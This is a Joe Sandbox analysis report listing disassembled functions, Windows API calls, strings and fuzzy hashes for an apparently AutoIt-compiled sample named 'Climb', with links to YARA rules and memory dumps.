Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: c4ffc65f9eb13b945e36b6c78a6e2ff2ebd58709fc0c8a8daa31911c528b6420
Instruction ID: adb841ebf3dacb38e938b976860a247dd4dc6b948a789f314133d1ee80f2621c
Opcode Fuzzy Hash: c4ffc65f9eb13b945e36b6c78a6e2ff2ebd58709fc0c8a8daa31911c528b6420
Instruction Fuzzy Hash: 32316F711083019FD311EF60D885FAFBBF8AF99354F04092DF585871A1EB719985CBA2

Function 00A6EE5B Relevance: 21.6, APIs: 14, Instructions: 609windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00A6EF07
timeGetTime.WINMM ref: 00A6F107
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A6F228
TranslateMessage.USER32(?), ref: 00A6F27B
DispatchMessageW.USER32(?), ref: 00A6F289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A6F29F
Sleep.KERNEL32(0000000A), ref: 00A6F2B1

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 4129db4c6b733412eb07534a77656be492f9381e53657637f0fbade5c4a22f50
Instruction ID: 7218734a169708f292684a8b4f4d7a435570640d4a4d81250f152653977b988f
Opcode Fuzzy Hash: 4129db4c6b733412eb07534a77656be492f9381e53657637f0fbade5c4a22f50
Instruction Fuzzy Hash: 96321371608302EFDB28DF24D884BAAB7F9BF85304F14462DE5558B292D775E984CF82

Function 00A63624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A63657
RegisterClassExW.USER32(00000030), ref: 00A63681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A63692
InitCommonControlsEx.COMCTL32(?), ref: 00A636AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A636BF
LoadIconW.USER32(000000A9), ref: 00A636D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A636E4

Strings

0, xrefs: 00A63639
TaskbarCreated, xrefs: 00A63687
+, xrefs: 00A63640
AutoIt v3 GUI, xrefs: 00A63673

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: df9934db3ba7a848164022bcdb5fa0a6ddfedb60f44353e75a46313b513801c3
Instruction ID: c4105d06203028a4ae7483c6225527b9afcb29309b9af1ab18b9a1e143b67cab
Opcode Fuzzy Hash: df9934db3ba7a848164022bcdb5fa0a6ddfedb60f44353e75a46313b513801c3
Instruction Fuzzy Hash: C921C5B1D01218AFDB01DFE4EC89BADBBB5FB08710F10421AF611A72A0DBB55545CF95

Function 00AA09DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AA071A: CreateFileW.KERNEL32(00000000,00000000,?,00AA0A84,?,?,00000000,?,00AA0A84,00000000,0000000C), ref: 00AA0737

GetLastError.KERNEL32 ref: 00AA0AEF
__dosmaperr.LIBCMT ref: 00AA0AF6
GetFileType.KERNEL32(00000000), ref: 00AA0B02
GetLastError.KERNEL32 ref: 00AA0B0C
__dosmaperr.LIBCMT ref: 00AA0B15
CloseHandle.KERNEL32(00000000), ref: 00AA0B35
CloseHandle.KERNEL32(?), ref: 00AA0C7F
GetLastError.KERNEL32 ref: 00AA0CB1
__dosmaperr.LIBCMT ref: 00AA0CB8

Strings

H, xrefs: 00AA0C3D

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: bb707916354f9b2bb492de1dd9d246453ed9648e3f4adb7110cc3c147e928120
Instruction ID: 1718203cde5db6ded8cc100dcf4f9449cae92ec911a3eaf4a17bc2952aa8935e
Opcode Fuzzy Hash: bb707916354f9b2bb492de1dd9d246453ed9648e3f4adb7110cc3c147e928120
Instruction Fuzzy Hash: 02A11632A042498FDF19EFB8D952BAD7BA1AB06324F140259F811DF2E1DB319D12CB61

Function 00A652A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A65594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00AA4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00A655B2

Part of subcall function 00A65238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A6525A

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A653C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00AA4BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00AA4C3E
RegCloseKey.ADVAPI32(?), ref: 00AA4C80
_wcslen.LIBCMT ref: 00AA4CE7
_wcslen.LIBCMT ref: 00AA4CF6

Strings

Include, xrefs: 00AA4BF4, 00AA4C35
\Include\, xrefs: 00A65381
\, xrefs: 00AA4CFC
Software\AutoIt v3\AutoIt, xrefs: 00A653BA

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: c971c0632c16e4db35d0012818c164ebbd2fbbcc211c613c5d25c666463cf69e
Instruction ID: a01bbd72e7a2fb12f7a44e58aa16a86ac134da2e99eb451731e4ef5d1d39eada
Opcode Fuzzy Hash: c971c0632c16e4db35d0012818c164ebbd2fbbcc211c613c5d25c666463cf69e
Instruction Fuzzy Hash: 4C718B71504301AEC301EF69E9819AFBBF8FF98B50F90442EF545872A0EF719A49CB95

Function 00A634D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00A634DE
LoadCursorW.USER32(00000000,00007F00), ref: 00A634ED
LoadIconW.USER32(00000063), ref: 00A63503
LoadIconW.USER32(000000A4), ref: 00A63515
LoadIconW.USER32(000000A2), ref: 00A63527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A6353F
RegisterClassExW.USER32(?), ref: 00A63590

Part of subcall function 00A63624: GetSysColorBrush.USER32(0000000F), ref: 00A63657
Part of subcall function 00A63624: RegisterClassExW.USER32(00000030), ref: 00A63681
Part of subcall function 00A63624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A63692
Part of subcall function 00A63624: InitCommonControlsEx.COMCTL32(?), ref: 00A636AF
Part of subcall function 00A63624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A636BF
Part of subcall function 00A63624: LoadIconW.USER32(000000A9), ref: 00A636D5
Part of subcall function 00A63624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A636E4

Strings

0, xrefs: 00A6355F
#, xrefs: 00A63566
AutoIt v3, xrefs: 00A6357F

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 4b15e65b1f888389daf45eb3081fe359e9916c639575dd3988095fcfaad3ec17
Instruction ID: a84a9164517ce3444f72efc207c47a254e6764caf8351d8a8453cdd97a12c5c7
Opcode Fuzzy Hash: 4b15e65b1f888389daf45eb3081fe359e9916c639575dd3988095fcfaad3ec17
Instruction Fuzzy Hash: B1211A75D00318AFDB11DFA9EC55AAEBFB5FB08B50F20401AE604A72A0DBB94545CF98

Function 00AE0FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00AE1019
inet_addr.WSOCK32(?), ref: 00AE1079
gethostbyname.WS2_32(?), ref: 00AE1085
IcmpCreateFile.IPHLPAPI ref: 00AE1093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AE1123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AE1142
IcmpCloseHandle.IPHLPAPI(?), ref: 00AE1216
WSACleanup.WSOCK32 ref: 00AE121C

Strings

Ping, xrefs: 00AE10D3

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: ec88082886a1abaef224ac14f245d4b75bd9f937cfda28d4c5a1495cb618dda4
Instruction ID: 11c7d0678c18914a107dcc5ba54b68c726c5516a13ea845f06663e61191ebcb8
Opcode Fuzzy Hash: ec88082886a1abaef224ac14f245d4b75bd9f937cfda28d4c5a1495cb618dda4
Instruction Fuzzy Hash: 679180316042919FD720DF56C988F16BBF1AF44318F1486ADF5698B6A2C731ED46CB81

Function 00A6370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00A63709,?,?), ref: 00A63777
KillTimer.USER32(?,00000001,?,?,?,?,?,00A63709,?,?), ref: 00A637A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A637C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00A63709,?,?), ref: 00A637D1
CreatePopupMenu.USER32 ref: 00A637E5
PostQuitMessage.USER32(00000000), ref: 00A63806

Strings

TaskbarCreated, xrefs: 00A637CC

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: bd01f94bcb3ab6679e4fc76c618bf7a0acb78a3cbd0cf1384a26efae33820899
Instruction ID: fbec2c483e447e8526994c261b7fe2d3f3cd6999dcbcc6977750260fa3cc9a50
Opcode Fuzzy Hash: bd01f94bcb3ab6679e4fc76c618bf7a0acb78a3cbd0cf1384a26efae33820899
Instruction Fuzzy Hash: D841F4F3600245BBDF15ABB89D4DBBD3AB9EB01300F104229F5028B2A1DB759B06D761

Function 00A990C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6695438312bfdeadf4b9f83ce088ae4841cf6781c3ce7c61de80d3448b0d9162
Instruction ID: e5e352a12b26ff4c75c9dffd227278beb16216f07265245f63bc455a23a6c0e3
Opcode Fuzzy Hash: 6695438312bfdeadf4b9f83ce088ae4841cf6781c3ce7c61de80d3448b0d9162
Instruction Fuzzy Hash: 37C1DF74B04249AFDF12EFACD841BAEBBF4BF49310F14419DE954AB292D7309942CB61

Function 00A7AC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d1r0,2, xrefs: 00A7ACA9
d10m0, xrefs: 00A7ACF0
d0b, xrefs: 00A7AC96, 00A7AD10, 00A7AEA7
d1b, xrefs: 00A7AD55, 00A7AE8E
i, xrefs: 00A7B0A3
d5m0, xrefs: 00A7AE75

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID:
String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
API String ID: 0-4285391669
Opcode ID: d50e894d0ed5f1cacf5506d34cb221a473221971bdd18aa164492682193a0137
Instruction ID: c7f1dcd4aa34b22d9edbb263f9f0773372b245dedb803a8efd7f4065f3295bbc
Opcode Fuzzy Hash: d50e894d0ed5f1cacf5506d34cb221a473221971bdd18aa164492682193a0137
Instruction Fuzzy Hash: E86246B0508345CFC724DF28C594AAABBE5BF88304F108A6EE5998B352DB71D945CF92

Function 00A635B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A635E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A63602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00A63368,?), ref: 00A63616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00A63368,?), ref: 00A6361F

Strings

edit, xrefs: 00A635FC
AutoIt v3, xrefs: 00A635D9, 00A635DE, 00A635DF

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 6df12ca2fa51ef837ea6288aa3cc9c99e42f69101cd11cdf8264c6f8a3e4187b
Instruction ID: e186f44cb85d88a02ae22f8401ce65a3143d2f6a8df5c2854fb436a0ca8c1d13
Opcode Fuzzy Hash: 6df12ca2fa51ef837ea6288aa3cc9c99e42f69101cd11cdf8264c6f8a3e4187b
Instruction Fuzzy Hash: 62F0F4715402947EE73157577C08F3B3EBED7C7F50F20041DBA0497160DA651855DA78

Function 00A661A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AA5287

Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A66299

Strings

AutoIt - , xrefs: 00A6620D
Line %d: , xrefs: 00AA5305

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: 5643d3fca49ea5c35a44ad54d4935ce19ca32e992c64bd383144fd2313ddff46
Instruction ID: 63fe30476c3628b5cea9335ba499971ce3c36b7ea0c53b72820fd4f67ff016e6
Opcode Fuzzy Hash: 5643d3fca49ea5c35a44ad54d4935ce19ca32e992c64bd383144fd2313ddff46
Instruction Fuzzy Hash: AF41AE71808304AEC311EB60ED55AEF7BECAF54724F10462EF599930A1EF349649C796

Function 00A658CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A658BE,SwapMouseButtons,00000004,?), ref: 00A658EF
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A658BE,SwapMouseButtons,00000004,?), ref: 00A65910
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00A658BE,SwapMouseButtons,00000004,?), ref: 00A65932

Strings

Control Panel\Mouse, xrefs: 00A658ED

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: e786c673eaf5ede7eb32e70c1adc6f69f4a215b4536d87af3126a4ad98321537
Instruction ID: 7dfb670cc124e76e7e4144f20629984563c95d96f5d7a31164c359ce9dcd2c30
Opcode Fuzzy Hash: e786c673eaf5ede7eb32e70c1adc6f69f4a215b4536d87af3126a4ad98321537
Instruction Fuzzy Hash: EA117C76910618FFDB21CFA4CC80DAE77B9EF00764F104419F802E7210E6319E41D7A0

Function 00A6F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00AB48C6

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 6e201237dd4b00ab84d77a5d0a7b5e445813830455a0ff64c8c8e44f0b0d564c
Instruction ID: ee8f01b370c991bc75c80a0ea3e6fd18280d8e34a7ab7dcff353a074418cf61d
Opcode Fuzzy Hash: 6e201237dd4b00ab84d77a5d0a7b5e445813830455a0ff64c8c8e44f0b0d564c
Instruction Fuzzy Hash: C3C28A75E00205DFCB24DFA8D980BAEB7F1BF19710F248169E909AB392D775AD41CB90

Function 00A70340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00A715F2

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 1c678708578b10cfe26ec67580e23613ad3c8a2d07fda31358dbf7ce8955ce6a
Instruction ID: 70bbde9da5109325a85fd46c4d5d176f43311969533ebdf5d9cd062f307fd393
Opcode Fuzzy Hash: 1c678708578b10cfe26ec67580e23613ad3c8a2d07fda31358dbf7ce8955ce6a
Instruction Fuzzy Hash: 45B26875A08340CFDB24CF28C890A2AB7F1BB99710F24C95DE9898B352D775ED45CB92

Function 00A8014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00A809D8

Part of subcall function 00A83614: RaiseException.KERNEL32(?,?,?,00A809FA,?,00000000,?,?,?,?,?,?,00A809FA,00000000,00B29758,00000000), ref: 00A83674

__CxxThrowException@8.LIBVCRUNTIME ref: 00A809F5

Strings

Unknown exception, xrefs: 00A80A02

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 44f2913243fa824ad02c13c9c46e7135110b8997dd305c8d90c1e54df07b550a
Instruction ID: b795e06b873b61f4a6910b4b162185536392121af5572e73f67fda16b5534908
